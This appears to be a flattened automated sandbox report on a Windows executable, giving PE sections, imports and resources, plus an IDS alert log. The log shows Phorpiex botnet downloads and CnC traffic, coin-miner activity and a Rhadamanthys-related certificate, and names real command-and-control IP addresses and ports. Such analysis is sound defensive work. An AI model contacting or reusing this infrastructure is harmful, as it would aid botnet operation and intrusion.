                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x24655e00x1ae8.ndata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x9b8.ndata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000x6f100x7000f569e353af0ed51bf4c216faa9bed4e7False0.6574009486607143data6.497884651859417IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .rdata0x80000x2a920x2c0091eee43954e068e650f7b73a8b0e6915False0.353515625data4.393893650965181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0xb0000x67ebc0x200db9f7acbf1c3ddfe255077b699955dfaFalse0.1953125data1.472782260995971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .ndata0x730000x45690000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rsrc0x45dc0000x5ec480x5ee00242e1d9fa4a81b3fe59b515ed782f12cFalse0.09209794960474309data3.968426157441028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .reloc0x463b0000xf8a0x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .zero0x463c0000xdb00x1000a789ccda75028397c9da51dd6fadaa07False0.47998046875data5.344870214596423IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_BITMAP0x45dca600x666Device independent bitmap graphic, 96 x 16 x 8, image size 1538, resolution 2868 x 2868 px/m, 15 important colorsEnglishUnited States0.18192918192918192
                                                                                                                                                                                                                                                  RT_ICON0x45dd0c80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States0.05414681776489037
                                                                                                                                                                                                                                                  RT_ICON0x461f0f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.1255619306754998
                                                                                                                                                                                                                                                  RT_ICON0x462f9180x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.22006376948512046
                                                                                                                                                                                                                                                  RT_ICON0x4633b400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.2940871369294606
                                                                                                                                                                                                                                                  RT_ICON0x46360e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.44090056285178236
                                                                                                                                                                                                                                                  RT_ICON0x46371900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.7163120567375887
                                                                                                                                                                                                                                                  RT_DIALOG0x46375f80xb4dataEnglishUnited States0.6111111111111112
                                                                                                                                                                                                                                                  RT_DIALOG0x46376b00x120dataEnglishUnited States0.5138888888888888
                                                                                                                                                                                                                                                  RT_DIALOG0x46377d00x18cdataEnglishUnited States0.5631313131313131
                                                                                                                                                                                                                                                  RT_DIALOG0x46379600x200dataEnglishUnited States0.3984375
                                                                                                                                                                                                                                                  RT_DIALOG0x4637b600xf8dataEnglishUnited States0.6290322580645161
                                                                                                                                                                                                                                                  RT_DIALOG0x4637c580xa0dataEnglishUnited States0.60625
                                                                                                                                                                                                                                                  RT_DIALOG0x4637cf80xeedataEnglishUnited States0.6260504201680672
                                                                                                                                                                                                                                                  RT_DIALOG0x4637de80xa0dataEnglishUnited States0.6
                                                                                                                                                                                                                                                  RT_DIALOG0x4637e880x10cdataEnglishUnited States0.5111940298507462
                                                                                                                                                                                                                                                  RT_DIALOG0x4637f980x178dataEnglishUnited States0.5585106382978723
                                                                                                                                                                                                                                                  RT_DIALOG0x46381100x1ecdataEnglishUnited States0.3861788617886179
                                                                                                                                                                                                                                                  RT_DIALOG0x46383000xe4dataEnglishUnited States0.6359649122807017
                                                                                                                                                                                                                                                  RT_DIALOG0x46383e80x8cdataEnglishUnited States0.5857142857142857
                                                                                                                                                                                                                                                  RT_DIALOG0x46384780xdadataEnglishUnited States0.6376146788990825
                                                                                                                                                                                                                                                  RT_DIALOG0x46385580xa4dataEnglishUnited States0.6158536585365854
                                                                                                                                                                                                                                                  RT_DIALOG0x46386000x110dataEnglishUnited States0.5183823529411765
                                                                                                                                                                                                                                                  RT_DIALOG0x46387100x17cdataEnglishUnited States0.5657894736842105
                                                                                                                                                                                                                                                  RT_DIALOG0x46388900x1f0dataEnglishUnited States0.3911290322580645
                                                                                                                                                                                                                                                  RT_DIALOG0x4638a800xe8dataEnglishUnited States0.6508620689655172
                                                                                                                                                                                                                                                  RT_DIALOG0x4638b680x90dataEnglishUnited States0.6041666666666666
                                                                                                                                                                                                                                                  RT_DIALOG0x4638bf80xdedataEnglishUnited States0.6486486486486487
                                                                                                                                                                                                                                                  RT_DIALOG0x4638cd80xa0dataEnglishUnited States0.60625
                                                                                                                                                                                                                                                  RT_DIALOG0x4638d780x10cdataEnglishUnited States0.5111940298507462
                                                                                                                                                                                                                                                  RT_DIALOG0x4638e880x178dataEnglishUnited States0.5611702127659575
                                                                                                                                                                                                                                                  RT_DIALOG0x46390000x1ecdataEnglishUnited States0.3861788617886179
                                                                                                                                                                                                                                                  RT_DIALOG0x46391f00xe4dataEnglishUnited States0.6447368421052632
                                                                                                                                                                                                                                                  RT_DIALOG0x46392d80x8cdataEnglishUnited States0.5928571428571429
                                                                                                                                                                                                                                                  RT_DIALOG0x46393680xdadataEnglishUnited States0.6422018348623854
                                                                                                                                                                                                                                                  RT_DIALOG0x46394480xacdataEnglishUnited States0.6337209302325582
                                                                                                                                                                                                                                                  RT_DIALOG0x46394f80x118dataEnglishUnited States0.5321428571428571
                                                                                                                                                                                                                                                  RT_DIALOG0x46396100x184dataEnglishUnited States0.5747422680412371
                                                                                                                                                                                                                                                  RT_DIALOG0x46397980x1f8dataEnglishUnited States0.4027777777777778
                                                                                                                                                                                                                                                  RT_DIALOG0x46399900xf0dataEnglishUnited States0.6666666666666666
                                                                                                                                                                                                                                                  RT_DIALOG0x4639a800x98dataEnglishUnited States0.625
                                                                                                                                                                                                                                                  RT_DIALOG0x4639b180xe6dataEnglishUnited States0.6565217391304348
                                                                                                                                                                                                                                                  RT_DIALOG0x4639c000xb4dataEnglishUnited States0.6833333333333333
                                                                                                                                                                                                                                                  RT_DIALOG0x4639cb80x120dataEnglishUnited States0.5381944444444444
                                                                                                                                                                                                                                                  RT_DIALOG0x4639dd80x18cdataEnglishUnited States0.5883838383838383
                                                                                                                                                                                                                                                  RT_DIALOG0x4639f680x200dataEnglishUnited States0.4140625
                                                                                                                                                                                                                                                  RT_DIALOG0x463a1680xf8dataEnglishUnited States0.6653225806451613
                                                                                                                                                                                                                                                  RT_DIALOG0x463a2600xa0dataEnglishUnited States0.68125
                                                                                                                                                                                                                                                  RT_DIALOG0x463a3000xeedataEnglishUnited States0.6512605042016807
                                                                                                                                                                                                                                                  RT_GROUP_ICON0x463a3f00x5adataEnglishUnited States0.7666666666666667
                                                                                                                                                                                                                                                  RT_VERSION0x463a4500x430data0.4123134328358209
                                                                                                                                                                                                                                                  RT_MANIFEST0x463a8800x3c8XML 1.0 document, ASCII text, with very long lines (968), with no line terminatorsEnglishUnited States0.5196280991735537
                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, CloseHandle, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrcpynA
                                                                                                                                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2024-12-05T17:31:34.169860+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.1150039185.215.113.665152TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:34.169860+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21185.215.113.6680192.168.2.1149710TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:34.169860+01002853272ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound1185.215.113.6680192.168.2.1149710TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:40.487004+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1149710185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:40.488686+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11185.215.113.6680192.168.2.1149710TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:43.307087+01002856563ETPRO MALWARE Phorpiex Domain in DNS Lookup1192.168.2.11634631.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-05T17:31:45.063425+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149721185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:52.642676+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149721185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:52.642676+01002853292ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin1192.168.2.1149721185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:56.247698+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149747185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:56.247698+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149747185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:58.006372+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230795.81.102.7240500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:31:59.111763+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149756185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:31:59.111763+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149756185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:03.043155+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230792.38.19.1040500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:04.849116+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149756185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:04.849116+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149756185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:05.059911+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149775185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:05.059911+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1149775185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:07.374436+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149781185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:07.374436+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149781185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:08.039333+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230745.150.24.4240500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:11.707461+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert192.255.85.665188192.168.2.1149792TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:12.945904+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149781185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:12.945904+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149781185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:13.051634+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.11623072.187.91.10840500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:13.190239+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149793185.215.113.8480TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:15.415639+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149800185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:15.415639+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149800185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:18.068485+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307109.74.69.4340500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:21.799108+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149800185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:21.799108+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149800185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:24.736506+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149819185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:24.736506+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149819185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:28.290139+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.11623072.133.136.14540500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:30.897343+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114983391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:30.926727+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149819185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:30.926727+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149819185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:33.313347+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.11623072.176.72.13640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:33.492490+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149838185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:33.492490+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149838185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:38.355798+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230789.236.217.7140500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:41.753669+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:41.753669+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:43.364147+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230789.219.115.15640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:44.277680+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:44.277680+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:47.058413+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:47.058413+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:48.383200+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307213.230.126.3940500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:49.525535+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:49.525535+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:52.001242+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:52.001242+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114986091.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:53.380543+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.11623072.179.117.3340500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:32:56.706016+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149903185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:56.706016+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149903185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:32:58.401795+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307217.30.162.16140500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:00.283137+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149912185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:00.283137+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149912185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:03.441463+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230795.59.165.10240500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:04.389434+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149922185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:04.389434+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149922185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:08.017766+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149933185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:08.017766+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149933185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:08.475109+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230790.156.160.3040500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:11.536043+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149941185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:11.536043+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1149941185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:13.491162+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230788.204.241.18240500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:16.187905+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114995391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:16.187905+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114995391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:19.696726+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114996391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:19.696726+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114996391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:23.261472+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114997191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:23.261472+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114997191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:26.948685+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114998191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:26.948685+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114998191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:28.529779+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307154.71.253.5440500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:30.498877+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.114999191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:30.498877+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.114999191.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:33.520524+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230792.124.152.23640500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:35.287748+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150003185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:35.287748+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150003185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:38.540485+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.116230790.156.162.540500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:38.893392+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150010185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:38.893392+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150010185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:42.671566+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150020185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:42.671566+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150020185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:46.277185+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150028185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:46.277185+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150028185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:49.902410+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1150031185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:49.902410+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1150031185.215.113.6680TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:53.590550+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307151.242.48.1940500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:33:54.656231+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115003391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:54.656231+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115003391.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:58.212808+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115003591.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:33:58.212808+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115003591.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:01.914153+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115003691.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:01.914153+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.115003691.202.233.14180TCP
                                                                                                                                                                                                                                                  2024-12-05T17:34:03.604243+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.1162307178.67.165.8840500UDP
                                                                                                                                                                                                                                                  2024-12-05T17:34:05.860091+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.115003891.202.233.14180TCP
